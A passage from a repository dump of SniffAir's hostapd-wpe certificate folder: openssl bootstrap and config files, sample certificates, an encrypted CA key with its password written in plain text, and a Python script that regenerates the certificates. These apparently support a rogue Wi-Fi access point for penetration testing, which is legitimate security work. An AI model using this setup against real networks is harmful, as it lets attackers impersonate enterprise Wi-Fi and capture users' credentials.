|| exit 1 70 | fi 71 | 72 | if [ ! -f ca.der ]; then 73 | openssl x509 -inform PEM -outform DER -in ca.pem -out ca.der || exit 1 74 | fi 75 | 76 | if [ ! -f client.key ]; then 77 | openssl req -new -out client.csr -keyout client.key -config ./client.cnf 78 | fi 79 | 80 | if [ ! -f client.crt ]; then 81 | openssl ca -batch -keyfile ca.key -cert ca.pem -in client.csr -key `grep output_password ca.cnf | sed 's/.*=//;s/^ *//'` -out client.crt -extensions xpclient_ext -extfile xpextensions -config ./client.cnf 82 | fi 83 | -------------------------------------------------------------------------------- /module/hostapd-wpe/certs/ca.cnf: -------------------------------------------------------------------------------- 1 | [ ca ] 2 | default_ca = CA_default 3 | 4 | [ CA_default ] 5 | dir = ./ 6 | certs = $dir 7 | crl_dir = $dir/crl 8 | database = $dir/index.txt 9 | new_certs_dir = $dir 10 | certificate = $dir/ca.pem 11 | serial = $dir/serial 12 | crl = $dir/crl.pem 13 | private_key = $dir/ca.key 14 | RANDFILE = $dir/.rand 15 | name_opt = ca_default 16 | cert_opt = ca_default 17 | default_days = 365 18 | default_crl_days = 30 19 | default_md = sha256 20 | preserve = no 21 | policy = policy_match 22 | 23 | [ policy_match ] 24 | countryName = match 25 | stateOrProvinceName = match 26 | organizationName = match 27 | organizationalUnitName = optional 28 | commonName = supplied 29 | emailAddress = optional 30 | 31 | [ policy_anything ] 32 | countryName = optional 33 | stateOrProvinceName = optional 34 | localityName = optional 35 | organizationName = optional 36 | organizationalUnitName = optional 37 | commonName = supplied 38 | emailAddress = optional 39 | 40 | [ req ] 41 | prompt = no 42 | distinguished_name = certificate_authority 43 | default_bits = 2048 44 | input_password = whatever 45 | output_password = whatever 46 | x509_extensions = v3_ca 47 | 48 | [certificate_authority] 49 | countryName = FR 50 | stateOrProvinceName = Radius 51 | localityName = Somewhere 52 | organizationName = Example Inc. 53 | emailAddress = admin@example.com 54 | commonName = "Example Certificate Authority" 55 | 56 | [v3_ca] 57 | subjectKeyIdentifier = hash 58 | authorityKeyIdentifier = keyid:always,issuer:always 59 | basicConstraints = CA:true 60 | -------------------------------------------------------------------------------- /module/hostapd-wpe/certs/ca.der: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Tylous/SniffAir/3dfbc2db650ff47cf10d8cbf089881405f08e6f4/module/hostapd-wpe/certs/ca.der -------------------------------------------------------------------------------- /module/hostapd-wpe/certs/ca.key: -------------------------------------------------------------------------------- 1 | -----BEGIN ENCRYPTED PRIVATE KEY----- 2 | MIIFHDBOBgkqhkiG9w0BBQ0wQTApBgkqhkiG9w0BBQwwHAQIThKBaxU94uQCAggA 3 | MAwGCCqGSIb3DQIJBQAwFAYIKoZIhvcNAwcECC9UK3zsYQN2BIIEyGrukomNGBjP 4 | ErPuRSXTbNQukbSISEI9mNLFqOXy+HcOqnvTJmib/kmAnGOIUjXvoHnmRuFxBFlQ 5 | 2G8SuitMOSMRdox3Me5UpNFOppJBByncNL+KODEI5UHl30bnTvKh8EJKjzT7fPJQ 6 | +AORWyHCIs/ck0MxmcVw7ixVYOAhANAts32R2qr2u2xsv6aGKCG0638FR/sYmQ/P 7 | JQH6AbVxXHqCehuWqoWh/ENZyJSLudsikMq5FhY5Z3Q7hUiQVqLcvwM6FvhG7IZQ 8 | lLQ/jfNLXQgZx4Jwfb11bjLnqwWadXweQlVm+xxQlvDK+T4MwTGAP82hM47kj1pa 9 | lBqk2vYgQ06lhF0ps77V0PAWruKhAAABrqbcbaajwk8VeAYObqeqibhYY8ng4iI4 10 | IExdnMd7LkCrqXbKUsikdO2I4yXnb4MypP8mt7pJoRQ6aoSmzSK+0YbGtkLwLucp 11 | Sj+SLVDkr6Cm4qToV+c+miJnPyAHJXmk9BSQR4UF6t09Qf/8VP4kRL2sPlahCl15 12 | gaMJm0YYIZQUpSvZ99t0uceA1Au2H/ZiV6mFUTxGoGrHScmnGnh5THuXZktwrj/6 13 | 1AtsWR+/DSktqKfgbu89ybUrUIq0krrOCghwuk0sMd7AIsio0jE2OzaCFKyUGpbi 14 | YXiNByZcAfFc+t9No7uXEDNMVgltHWcSXxGuwLoKTh2E5VsuQkVpAdOS7o2NvWuc 15 | QQSItq1ZlG5Gwup3JKpo/BVdvqfHn9ciARP/iBQ5t/YmAF1bDkGsXNQm97+qLtFi 16 | KWOFD+6kTUJWaQ78IzWHBm1gsQ+gsu9OPw7JIRN8A6pThaHgUCH1jCZR7Cgcz4LZ 17 | Q3m3J03ln+mOo6ez9wL1OLsV/s6nXHKBDLC4tAkyIpMmeKdxRbMfoxjcmrtpRCTz 18 | GFnfPmNfasmogmoxAqMy4RR8v6r3R1fd4/21ZEaLP4iV72dZdGFwQ1G46LMrFf7G 19 | 4lazI/9Z8ktfIzy/dt5UM5CIlNgClBVRbU6pCjvO3VeWzY5bX/18O8XLfHxkQ/DW 20 | ZqIJWxXVIHD2zLGbFQKdLgtH6mvvP6wcBVyX1cMdYfWGN0HJiORmDrJjQTJP1DXN 21 | 3ZKSxtRTvgQxsC/sG3rEmRMKOO+LBSufyi63F7RCEWUXKGajoTt/8mdP5sJ2H2+/ 22 | IBGIPM9OK/oumfHbuf2IW1x0OM/i3c7/9CDQdSBBlrwUU8XU/6o7xAv0Y6rQI5Au 23 | R8g67Kmsd3S6TgPmV3Sjwm2WwRQNTWv+1aerla8Kb94u/Z8D9xH1DzHz329pfz4l 24 | XcY++SusCI6E0Nl/wy/CkBcmcTFfDZmnv/w5FW+eSxoB6VU3aPJQbFxhLiQWn/x/ 25 | ovkxH7fCBut2zz9WmY0gGRkmbhjuwgMRBgBQpMMCCA72G8DeDmp3zMowPaQX2ggU 26 | /VP47c+swYYHOCaPxuCaVvWKR+XcyuhETeBZjhk+GphW588sffjhigC5WHjpkI9o 27 | 6orN9rcLG7RMZKTSs54YcsHncvDLPS/i6x7viJ3ys6IYRlnCObIe72i7D8cQm3o0 28 | qNepFvfxWVQ96q48I97PLDXszAGIgNeGPccDToWjxNUE67R+YPSz6wgoaNGGwAms 29 | HXdCUbcb24618YflKXZKRw== 30 | -----END ENCRYPTED PRIVATE KEY----- 31 | -------------------------------------------------------------------------------- /module/hostapd-wpe/certs/ca.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIEpzCCA4+gAwIBAgIJANDEBaiF/je4MA0GCSqGSIb3DQEBCwUAMIGTMQswCQYD 3 | VQQGEwJGUjEPMA0GA1UECAwGUmFkaXVzMRIwEAYDVQQHDAlTb21ld2hlcmUxFTAT 4 | BgNVBAoMDEV4YW1wbGUgSW5jLjEgMB4GCSqGSIb3DQEJARYRYWRtaW5AZXhhbXBs 5 | ZS5jb20xJjAkBgNVBAMMHUV4YW1wbGUgQ2VydGlmaWNhdGUgQXV0aG9yaXR5MB4X 6 | DTE3MDkxNTAyNDQ0NloXDTE4MDkxNTAyNDQ0NlowgZMxCzAJBgNVBAYTAkZSMQ8w 7 | DQYDVQQIDAZSYWRpdXMxEjAQBgNVBAcMCVNvbWV3aGVyZTEVMBMGA1UECgwMRXhh 8 | bXBsZSBJbmMuMSAwHgYJKoZIhvcNAQkBFhFhZG1pbkBleGFtcGxlLmNvbTEmMCQG 9 | A1UEAwwdRXhhbXBsZSBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkwggEiMA0GCSqGSIb3 10 | DQEBAQUAA4IBDwAwggEKAoIBAQCtH1ARd29okqKODW0QZnknzbpz6ENknCZhhuAF 11 | hk1qir1HH91SyrQWHZWxPPxNUO94pEC4MS/FKDo1ACFkMJQFKimLvct5p3nSHV6q 12 | ftQHparw9rQgQUKT0EHC280S2ynGpobaFdRCacrA1DHnE6FUIn+zWmUo5Bejceh6 13 | 5e2rrUeh6Cv/9P+SmcLCB7f0LUmLpyAcbIEjLx6gT9fHZCirI1yWYKqvYWXD38Kn 14 | G3aZTkuiYI72IVZdvgg4ET123SSNf9Q9jrloopnFchKQXvNLQyZkxizdNxKFWFmH 15 | T5R05S+K4V3dj6QttQlHg6qnjhrW10ztR5A+jX57wCn53dkHAgMBAAGjgfswgfgw 16 | HQYDVR0OBBYEFHN1SgmoWXpzSFyQ0VziAfLGpUYoMIHIBgNVHSMEgcAwgb2AFHN1 17 | SgmoWXpzSFyQ0VziAfLGpUYooYGZpIGWMIGTMQswCQYDVQQGEwJGUjEPMA0GA1UE 18 | CAwGUmFkaXVzMRIwEAYDVQQHDAlTb21ld2hlcmUxFTATBgNVBAoMDEV4YW1wbGUg 19 | SW5jLjEgMB4GCSqGSIb3DQEJARYRYWRtaW5AZXhhbXBsZS5jb20xJjAkBgNVBAMM 20 | HUV4YW1wbGUgQ2VydGlmaWNhdGUgQXV0aG9yaXR5ggkA0MQFqIX+N7gwDAYDVR0T 21 | BAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEAPWBXJlS1yogW8fCLBodkQ4mEdIrm 22 | dZLqfmwKjGplpw3lwB4vudqaTX1X43tG//pqmweshdSZKi/5QzmXsQehXxspUdPQ 23 | sEHR3JOVs48SWcS+1O18dDsDHFS8LXOeXRtUHx6DAkyd3eQBEb+5DqmMnm7Rud6x 24 | 6fYzUzKdw85/TUSn1aQYpmTaP2K0uvUcDe9L5sJYWN+pXGCsqYrlbhGN3BDU9arW 25 | JWuGIAiLWf3BjxlD5g6Ub7j6wN4RErj8+uSZXZuFcxDMyeIONjeQfa0Kjfw7NsdF 26 | U9aHs9fGIitgXlbww/eUAma3uUs9NIpdZeOJtmJ5IW/zRh9NtMEMuc++yQ== 27 | -----END CERTIFICATE----- 28 | -------------------------------------------------------------------------------- /module/hostapd-wpe/certs/cert.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import argparse 3 | from argparse import ArgumentParser, SUPPRESS, ArgumentError 4 | import os 5 | import subprocess 6 | 7 | 8 | parser = argparse.ArgumentParser(usage=SUPPRESS) 9 | parser.add_argument('-c', '--countryName', metavar='countryName', dest='countryName', action='store', help='countryName\n', required=True) 10 | parser.add_argument('-s', '--stateOrProvinceName', metavar='stateOrProvinceName', dest='stateOrProvinceName', action='store', help='stateOrProvinceName\n', required=True) 11 | parser.add_argument('-l', '--localityName', metavar='localityName', dest='localityName', action='store', help='localityName\n', required=True) 12 | parser.add_argument('-o', '--organizationName', metavar='organizationName', dest='organizationName', action='store', help='organizationName\n', required=False) 13 | parser.add_argument('-e', '--emailAddress', metavar='emailAddress', dest='emailAddress', action='store', help='emailAddress\n', required=True) 14 | parser.add_argument('-n', '--commonName', metavar='commonName', dest='commonName', action='store', help='commonName\n', required=True) 15 | parser.add_argument('-r', '--radius', metavar='radius', dest='radius', action='store', help='radius\n', required=True) 16 | args = parser.parse_args() 17 | 18 | oldfiles = "01.pem", "ca.key", "ca.pem", "dh", "index.txt", "index.txt.attr", "index.txt.old", "random", "serial", "serial.old", "server.crt", "server.key", "server.p12", "server.pem", "ca.cnf", "server.cnf", "server.csr" 19 | 20 | 21 | for file in oldfiles: 22 | file = "module/hostapd-wpe/certs/" + file 23 | if not os.path.isfile(file): 24 | continue 25 | else: 26 | os.remove(file) 27 | 28 | 29 | files = ['ca.cnf', 'server.cnf'] 30 | 31 | 32 | options = ("countryName = " + args.countryName+ "\n" 33 | "stateOrProvinceName = " + args.stateOrProvinceName + "\n" 34 | "localityName = " + args.localityName + "\n" 35 | "organizationName = " + args.organizationName + "\n" 36 | "emailAddress = " + args.emailAddress + "\n" 37 | "commonName = " + args.commonName + "\n" 38 | ) 39 | 40 | options1 = ("countryName = " + args.countryName+ "\n" 41 | "stateOrProvinceName = " + args.stateOrProvinceName + "\n" 42 | "localityName = " + args.localityName + "\n" 43 | "organizationName = " + args.organizationName + "\n" 44 | "emailAddress = " + args.emailAddress + "\n" 45 | "commonName = " + args.radius + "\n" 46 | ) 47 | 48 | 49 | ca = ''' 50 | 51 | [ca ] 52 | 53 | default_ca = CA_default 54 | 55 | [ CA_default ] 56 | dir = ./ 57 | certs = $dir 58 | crl_dir = $dir/crl 59 | database = $dir/index.txt 60 | new_certs_dir = $dir 61 | certificate = $dir/server.pem 62 | serial = $dir/serial 63 | crl = $dir/crl.pem 64 | private_key = $dir/server.key 65 | RANDFILE = $dir/.rand 66 | name_opt = ca_default 67 | cert_opt = ca_default 68 | default_days = 365 69 | default_crl_days = 30 70 | default_md = sha256 71 | preserve = no 72 | policy = policy_match 73 | 74 | [ policy_match ] 75 | countryName = match 76 | stateOrProvinceName = match 77 | organizationName = match 78 | organizationalUnitName = optional 79 | commonName = supplied 80 | emailAddress = optional 81 | 82 | [ policy_anything ] 83 | countryName = optional 84 | stateOrProvinceName = optional 85 | localityName = optional 86 | organizationName = optional 87 | organizationalUnitName = optional 88 | commonName = supplied 89 | emailAddress = optional 90 | 91 | [ req ] 92 | prompt = no 93 | distinguished_name = certificate_authority 94 | default_bits = 2048 95 | input_password = whatever 96 | output_password = whatever 97 | 98 | [certificate_authority] 99 | 100 | ''' 101 | 102 | 103 | 104 | server = ''' 105 | 106 | [ ca ] 107 | default_ca = CA_default 108 | 109 | [ CA_default ] 110 | dir = ./ 111 | certs = $dir 112 | crl_dir = $dir/crl 113 | database = $dir/index.txt 114 | new_certs_dir = $dir 115 | certificate = $dir/server.pem 116 | serial = $dir/serial 117 | crl = $dir/crl.pem 118 | private_key = $dir/server.key 119 | RANDFILE = $dir/.rand 120 | name_opt = ca_default 121 | cert_opt = ca_default 122 | default_days = 365 123 | default_crl_days = 30 124 | default_md = sha256 125 | preserve = no 126 | policy = policy_match 127 | 128 | [ policy_match ] 129 | countryName = match 130 | stateOrProvinceName = match 131 | organizationName = match 132 | organizationalUnitName = optional 133 | commonName = supplied 134 | emailAddress = optional 135 | 136 | [ policy_anything ] 137 | countryName = optional 138 | stateOrProvinceName = optional 139 | localityName = optional 140 | organizationName = optional 141 | organizationalUnitName = optional 142 | commonName = supplied 143 | emailAddress = optional 144 | 145 | [ req ] 146 | prompt = no 147 | distinguished_name = server 148 | default_bits = 2048 149 | input_password = whatever 150 | output_password = whatever 151 | 152 | [server] 153 | 154 | ''' 155 | 156 | 157 | file = ca + options 158 | outfile = open('module/hostapd-wpe/certs/ca.cnf', 'w') 159 | outfile.write(file) 160 | outfile.close() 161 | file = server + options1 162 | outfile = open('module/hostapd-wpe/certs/server.cnf', 'w') 163 | outfile.write(file) 164 | outfile.close() 165 | subprocess.call('./module/hostapd-wpe/certs/bootstrap', shell=True) 166 | -------------------------------------------------------------------------------- /module/hostapd-wpe/certs/client.cnf: -------------------------------------------------------------------------------- 1 | [ ca ] 2 | default_ca = CA_default 3 | 4 | [ CA_default ] 5 | dir = ./ 6 | certs = $dir 7 | crl_dir = $dir/crl 8 | database = $dir/index.txt 9 | new_certs_dir = $dir 10 | certificate = $dir/server.pem 11 | serial = $dir/serial 12 | crl = $dir/crl.pem 13 | private_key = $dir/server.key 14 | RANDFILE = $dir/.rand 15 | name_opt = ca_default 16 | cert_opt = ca_default 17 | default_days = 365 18 | default_crl_days = 30 19 | default_md = sha256 20 | preserve = no 21 | policy = policy_match 22 | 23 | [ policy_match ] 24 | countryName = match 25 | stateOrProvinceName = match 26 | organizationName = match 27 | organizationalUnitName = optional 28 | commonName = supplied 29 | emailAddress = optional 30 | 31 | [ policy_anything ] 32 | countryName = optional 33 | stateOrProvinceName = optional 34 | localityName = optional 35 | organizationName = optional 36 | organizationalUnitName = optional 37 | commonName = supplied 38 | emailAddress = optional 39 | 40 | [ req ] 41 | prompt = no 42 | distinguished_name = client 43 | default_bits = 2048 44 | input_password = whatever 45 | output_password = whatever 46 | 47 | [client] 48 | countryName = FR 49 | stateOrProvinceName = Radius 50 | localityName = Somewhere 51 | organizationName = Example Inc. 52 | emailAddress = user@example.com 53 | commonName = user@example.com 54 | -------------------------------------------------------------------------------- /module/hostapd-wpe/certs/demoCA/cacert.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDtjCCAx+gAwIBAgIBADANBgkqhkiG9w0BAQQFADCBnzELMAkGA1UEBhMCQ0Ex 3 | ETAPBgNVBAgTCFByb3ZpbmNlMRIwEAYDVQQHEwlTb21lIENpdHkxFTATBgNVBAoT 4 | DE9yZ2FuaXphdGlvbjESMBAGA1UECxMJbG9jYWxob3N0MRswGQYDVQQDExJDbGll 5 | bnQgY2VydGlmaWNhdGUxITAfBgkqhkiG9w0BCQEWEmNsaWVudEBleGFtcGxlLmNv 6 | bTAeFw0wNDAxMjUxMzI2MDdaFw0wNjAxMjQxMzI2MDdaMIGfMQswCQYDVQQGEwJD 7 | QTERMA8GA1UECBMIUHJvdmluY2UxEjAQBgNVBAcTCVNvbWUgQ2l0eTEVMBMGA1UE 8 | ChMMT3JnYW5pemF0aW9uMRIwEAYDVQQLEwlsb2NhbGhvc3QxGzAZBgNVBAMTEkNs 9 | aWVudCBjZXJ0aWZpY2F0ZTEhMB8GCSqGSIb3DQEJARYSY2xpZW50QGV4YW1wbGUu 10 | Y29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDUxbGXJPFkrPH/sYnbHI+/ 11 | 9PFDlup8sekPeNaUUXJTd4ld/lLMuZtB6A3etYsSepQ/T1jLxWKHgZL73G/s6fhx 12 | 58Ew01z1GIgX6bEzJJ7dKhx10xBDrodVPOx6d+8mqn10KB25t34XxkRsXdmxiLQy 13 | UMoCKZY3IqEjpyawC0An/QIDAQABo4H/MIH8MB0GA1UdDgQWBBRo020+Hue8nVoF 14 | cCHDY9oTZdGt4zCBzAYDVR0jBIHEMIHBgBRo020+Hue8nVoFcCHDY9oTZdGt46GB 15 | paSBojCBnzELMAkGA1UEBhMCQ0ExETAPBgNVBAgTCFByb3ZpbmNlMRIwEAYDVQQH 16 | EwlTb21lIENpdHkxFTATBgNVBAoTDE9yZ2FuaXphdGlvbjESMBAGA1UECxMJbG9j 17 | YWxob3N0MRswGQYDVQQDExJDbGllbnQgY2VydGlmaWNhdGUxITAfBgkqhkiG9w0B 18 | CQEWEmNsaWVudEBleGFtcGxlLmNvbYIBADAMBgNVHRMEBTADAQH/MA0GCSqGSIb3 19 | DQEBBAUAA4GBADPAC2ax5Xnvc6BnmCUtq41eVRH8AP0nbYDRL4NHd8Z0P9wnQ/yh 20 | UHcE5LwJeeT2CsOtnug+bzRzaSKdH3cim6LpgjWdpWMCSgAWPbptbJhsC60or4UT 21 | L/jw12UBvxt8Lf9ljOHmLAGZe25k4+jUNzNUzpkShHZRU5BjuFu8VIXF 22 | -----END CERTIFICATE----- 23 | -------------------------------------------------------------------------------- /module/hostapd-wpe/certs/dh: -------------------------------------------------------------------------------- 1 | -----BEGIN DH PARAMETERS----- 2 | MIGHAoGBAP1zpflTICmwsu+2F3a2gi8mfeL+42Bk2DcZC1hPYAjVtJBy3NzJ1FBP 3 | iWIudRw/7CxaLlmY5tsThmYwgKB+MGyH0lckPBaK84GJLb6ZzTGo63DWBzcfxIss 4 | 7ZqPCSsdb/945V1gMQ47NjrrLN46bHMo7KHB5/qzRDYBW+PilO/TAgEC 5 | -----END DH PARAMETERS----- 6 | -------------------------------------------------------------------------------- /module/hostapd-wpe/certs/index.txt: -------------------------------------------------------------------------------- 1 | V 180915024446Z 01 unknown /C=FR/ST=Radius/O=Example Inc./CN=Example Server Certificate/emailAddress=admin@example.com 2 | -------------------------------------------------------------------------------- /module/hostapd-wpe/certs/index.txt.attr: -------------------------------------------------------------------------------- 1 | unique_subject = yes 2 | -------------------------------------------------------------------------------- /module/hostapd-wpe/certs/index.txt.old: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Tylous/SniffAir/3dfbc2db650ff47cf10d8cbf089881405f08e6f4/module/hostapd-wpe/certs/index.txt.old -------------------------------------------------------------------------------- /module/hostapd-wpe/certs/random: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Tylous/SniffAir/3dfbc2db650ff47cf10d8cbf089881405f08e6f4/module/hostapd-wpe/certs/random -------------------------------------------------------------------------------- /module/hostapd-wpe/certs/serial: -------------------------------------------------------------------------------- 1 | 02 2 | -------------------------------------------------------------------------------- /module/hostapd-wpe/certs/serial.old: -------------------------------------------------------------------------------- 1 | 01 2 | -------------------------------------------------------------------------------- /module/hostapd-wpe/certs/server.cnf: -------------------------------------------------------------------------------- 1 | [ ca ] 2 | default_ca = CA_default 3 | 4 | [ CA_default ] 5 | dir = ./ 6 | certs = $dir 7 | crl_dir = $dir/crl 8 | database = $dir/index.txt 9 | new_certs_dir = $dir 10 | certificate = $dir/server.pem 11 | serial = $dir/serial 12 | crl = $dir/crl.pem 13 | private_key = $dir/server.key 14 | RANDFILE = $dir/.rand 15 | name_opt = ca_default 16 | cert_opt = ca_default 17 | default_days = 365 18 | default_crl_days = 30 19 | default_md = sha256 20 | preserve = no 21 | policy = policy_match 22 | 23 | [ policy_match ] 24 | countryName = match 25 | stateOrProvinceName = match 26 | organizationName = match 27 | organizationalUnitName = optional 28 | commonName = supplied 29 | emailAddress = optional 30 | 31 | [ policy_anything ] 32 | countryName = optional 33 | stateOrProvinceName = optional 34 | localityName = optional 35 | organizationName = optional 36 | organizationalUnitName = optional 37 | commonName = supplied 38 | emailAddress = optional 39 | 40 | [ req ] 41 | prompt = no 42 | distinguished_name = server 43 | default_bits = 2048 44 | input_password = whatever 45 | output_password = whatever 46 | 47 | [server] 48 | countryName = FR 49 | stateOrProvinceName = Radius 50 | localityName = Somewhere 51 | organizationName = Example Inc. 52 | emailAddress = admin@example.com 53 | commonName = "Example Server Certificate" 54 | 55 | -------------------------------------------------------------------------------- /module/hostapd-wpe/certs/server.crt: -------------------------------------------------------------------------------- 1 | Certificate: 2 | Data: 3 | Version: 3 (0x2) 4 | Serial Number: 1 (0x1) 5 | Signature Algorithm: md5WithRSAEncryption 6 | Issuer: C=FR, ST=Radius, L=Somewhere, O=Example Inc./emailAddress=admin@example.com, CN=Example Certificate Authority 7 | Validity 8 | Not Before: Sep 15 02:44:46 2017 GMT 9 | Not After : Sep 15 02:44:46 2018 GMT 10 | Subject: C=FR, ST=Radius, O=Example Inc., CN=Example Server Certificate/emailAddress=admin@example.com 11 | Subject Public Key Info: 12 | Public Key Algorithm: rsaEncryption 13 | Public-Key: (2048 bit) 14 | Modulus: 15 | 00:aa:ed:54:dc:3f:6d:44:40:26:36:a0:36:a8:77: 16 | 1c:02:a5:4c:b8:69:79:95:42:53:a9:38:a2:bc:51: 17 | 9f:6e:47:ab:55:f8:94:28:4c:17:81:17:2f:02:3a: 18 | 7d:94:fb:4e:b9:c8:87:23:f8:68:85:a1:52:03:75: 19 | fb:cb:76:1a:04:64:62:c9:88:a0:19:df:46:4c:07: 20 | 5b:9d:e3:6b:88:ff:7b:e6:99:67:d3:b7:ff:f7:9d: 21 | 62:34:dc:fe:b8:29:45:ea:c2:d5:b7:62:13:90:81: 22 | 13:0e:9e:30:6e:e5:4d:22:a5:1a:a5:9d:c2:b7:91: 23 | 33:80:eb:9b:2e:6d:d8:77:75:f6:51:bb:a6:6d:ba: 24 | 61:72:e7:f3:46:f3:5f:a2:29:da:a1:e8:e6:ae:21: 25 | 09:28:ec:f3:62:70:42:80:d4:3d:f7:63:f4:1f:84: 26 | 60:cb:ca:b5:01:32:ea:1d:8b:bb:e5:58:9e:69:84: 27 | 0a:1a:75:89:26:9c:a5:71:db:a8:77:00:79:5d:d4: 28 | 7d:1c:a6:dd:7e:06:36:6b:7f:a9:5a:7c:e9:6b:bc: 29 | fc:cd:58:03:54:ca:30:23:66:b4:c1:2b:39:d6:c7: 30 | 68:43:12:04:79:59:ad:16:48:c2:c3:94:67:56:44: 31 | 0e:b4:c6:29:05:6a:3f:7a:3d:81:98:86:45:5c:53: 32 | 90:23 33 | Exponent: 65537 (0x10001) 34 | X509v3 extensions: 35 | X509v3 Extended Key Usage: 36 | TLS Web Server Authentication 37 | Signature Algorithm: md5WithRSAEncryption 38 | 93:c3:3b:04:3f:2f:a4:d0:3e:05:4d:8b:2a:3b:75:97:7c:49: 39 | e0:69:e2:2b:4b:a0:ad:c7:b4:67:1b:47:c3:d7:d4:13:60:e3: 40 | 02:0a:cf:c8:27:a5:a2:96:8f:18:43:16:f5:02:ed:af:ed:b7: 41 | e6:67:30:dd:28:08:09:3b:90:18:a6:34:16:3a:5a:10:76:5d: 42 | a1:b8:52:84:69:39:cc:76:f2:72:90:8c:57:2f:36:5b:99:55: 43 | 01:83:16:20:63:67:12:87:a0:78:3e:1e:4a:e7:bf:5a:01:de: 44 | ad:ae:51:55:cc:6b:2e:e4:32:ea:ae:a1:71:33:f5:ea:58:c3: 45 | 89:b6:84:a9:9d:ae:ce:f4:42:6a:c5:f6:a8:2f:7d:8c:3d:e9: 46 | 99:f7:0a:fc:c4:c4:c3:3b:b9:ad:cb:0d:30:87:05:96:c7:e7: 47 | bb:78:fd:43:11:a1:fe:8e:87:4b:1a:f1:38:bc:1b:28:0f:82: 48 | e7:63:5c:c8:0d:52:b6:dd:da:32:b1:b4:f8:5d:95:b2:cf:37: 49 | 1c:2a:2c:43:c5:52:9a:5d:74:25:76:a0:55:e0:be:81:5d:31: 50 | 57:8e:e5:6e:05:19:5b:a7:db:d1:ee:66:39:e4:da:42:e4:08: 51 | a5:22:70:97:1c:68:21:2d:d7:7e:10:a4:76:08:99:57:c2:0d: 52 | fc:94:1e:17 53 | -----BEGIN CERTIFICATE----- 54 | MIIDojCCAoqgAwIBAgIBATANBgkqhkiG9w0BAQQFADCBkzELMAkGA1UEBhMCRlIx 55 | DzANBgNVBAgMBlJhZGl1czESMBAGA1UEBwwJU29tZXdoZXJlMRUwEwYDVQQKDAxF 56 | eGFtcGxlIEluYy4xIDAeBgkqhkiG9w0BCQEWEWFkbWluQGV4YW1wbGUuY29tMSYw 57 | JAYDVQQDDB1FeGFtcGxlIENlcnRpZmljYXRlIEF1dGhvcml0eTAeFw0xNzA5MTUw 58 | MjQ0NDZaFw0xODA5MTUwMjQ0NDZaMHwxCzAJBgNVBAYTAkZSMQ8wDQYDVQQIDAZS 59 | YWRpdXMxFTATBgNVBAoMDEV4YW1wbGUgSW5jLjEjMCEGA1UEAwwaRXhhbXBsZSBT 60 | ZXJ2ZXIgQ2VydGlmaWNhdGUxIDAeBgkqhkiG9w0BCQEWEWFkbWluQGV4YW1wbGUu 61 | Y29tMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqu1U3D9tREAmNqA2 62 | qHccAqVMuGl5lUJTqTiivFGfbkerVfiUKEwXgRcvAjp9lPtOuciHI/hohaFSA3X7 63 | y3YaBGRiyYigGd9GTAdbneNriP975pln07f/951iNNz+uClF6sLVt2ITkIETDp4w 64 | buVNIqUapZ3Ct5EzgOubLm3Yd3X2UbumbbphcufzRvNfoinaoejmriEJKOzzYnBC 65 | gNQ992P0H4Rgy8q1ATLqHYu75VieaYQKGnWJJpylcduodwB5XdR9HKbdfgY2a3+p 66 | Wnzpa7z8zVgDVMowI2a0wSs51sdoQxIEeVmtFkjCw5RnVkQOtMYpBWo/ej2BmIZF 67 | XFOQIwIDAQABoxcwFTATBgNVHSUEDDAKBggrBgEFBQcDATANBgkqhkiG9w0BAQQF 68 | AAOCAQEAk8M7BD8vpNA+BU2LKjt1l3xJ4GniK0ugrce0ZxtHw9fUE2DjAgrPyCel 69 | opaPGEMW9QLtr+235mcw3SgICTuQGKY0FjpaEHZdobhShGk5zHbycpCMVy82W5lV 70 | AYMWIGNnEoegeD4eSue/WgHera5RVcxrLuQy6q6hcTP16ljDibaEqZ2uzvRCasX2 71 | qC99jD3pmfcK/MTEwzu5rcsNMIcFlsfnu3j9QxGh/o6HSxrxOLwbKA+C52NcyA1S 72 | tt3aMrG0+F2Vss83HCosQ8VSml10JXagVeC+gV0xV47lbgUZW6fb0e5mOeTaQuQI 73 | pSJwlxxoIS3XfhCkdgiZV8IN/JQeFw== 74 | -----END CERTIFICATE----- 75 | -------------------------------------------------------------------------------- /module/hostapd-wpe/certs/server.csr: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE REQUEST----- 2 | MIIC1jCCAb4CAQAwgZAxCzAJBgNVBAYTAkZSMQ8wDQYDVQQIDAZSYWRpdXMxEjAQ 3 | BgNVBAcMCVNvbWV3aGVyZTEVMBMGA1UECgwMRXhhbXBsZSBJbmMuMSAwHgYJKoZI 4 | hvcNAQkBFhFhZG1pbkBleGFtcGxlLmNvbTEjMCEGA1UEAwwaRXhhbXBsZSBTZXJ2 5 | ZXIgQ2VydGlmaWNhdGUwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCq 6 | 7VTcP21EQCY2oDaodxwCpUy4aXmVQlOpOKK8UZ9uR6tV+JQoTBeBFy8COn2U+065 7 | yIcj+GiFoVIDdfvLdhoEZGLJiKAZ30ZMB1ud42uI/3vmmWfTt//3nWI03P64KUXq 8 | wtW3YhOQgRMOnjBu5U0ipRqlncK3kTOA65subdh3dfZRu6ZtumFy5/NG81+iKdqh 9 | 6OauIQko7PNicEKA1D33Y/QfhGDLyrUBMuodi7vlWJ5phAoadYkmnKVx26h3AHld 10 | 1H0cpt1+BjZrf6lafOlrvPzNWANUyjAjZrTBKznWx2hDEgR5Wa0WSMLDlGdWRA60 11 | xikFaj96PYGYhkVcU5AjAgMBAAGgADANBgkqhkiG9w0BAQsFAAOCAQEAOA7SIAgx 12 | N9ptg3FWD5l7K/Z6L8p+q8N4qrEDX8vfXlEix/P78YIBShHNNZiX7yWQKTEqeMwN 13 | UJyWgQRu9MAhcKBNRayOPZ44NrYmH4ajJHxoiAXYbtWgvG1AU3KzrsSk7+YEp+9d 14 | qYeaIx1zp8jogHDu9IrnZdzlZxFZlHqNmucs+jRbxfAK43WKZebH8VlpeVpDu5tZ 15 | 